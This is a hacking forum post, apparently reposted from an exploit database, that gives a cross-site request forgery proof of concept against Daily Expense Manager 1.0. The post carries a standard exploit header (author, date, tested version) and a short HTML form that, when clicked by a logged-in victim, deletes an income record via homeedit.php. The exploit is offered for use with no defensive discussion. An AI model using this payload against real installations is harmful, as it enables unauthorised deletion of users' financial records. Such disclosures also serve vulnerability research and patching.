Jump to content

Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)

 Share
This CHT

By This CHT,
in CHT Vulnerability database

Recommended Posts

This CHT Grand Master

This CHT

Posted
Posted 
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
	<form action="http://server/homeedit.php?delincome=778" method="post">
		<input type="submit" value="Click!" />
	</form>
</body>
</html>
Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
www.chthackerworld.com - 我们是一个生机勃勃的技术交流社区,致力于学习和分享黑客攻防知识、技术爱好、编程专业知识,并拥有许多正在开发的活跃项目。加入我们的用户可以在其中讨论黑客攻击、网络安全等。并参与本论坛举办的赛事!我们不会对友国或本国任何站点上进行非法渗透入侵或破坏网络活动,如果使用名称为The hacker World 或 CNHACKTEAM 名称进行黑客活动,请从站点服务器访问日志中识别执行此活动的 IP 地址,我们将积极配合调查。

黑客世界站内导航 (SITE MAP)

×
×
  • Create New...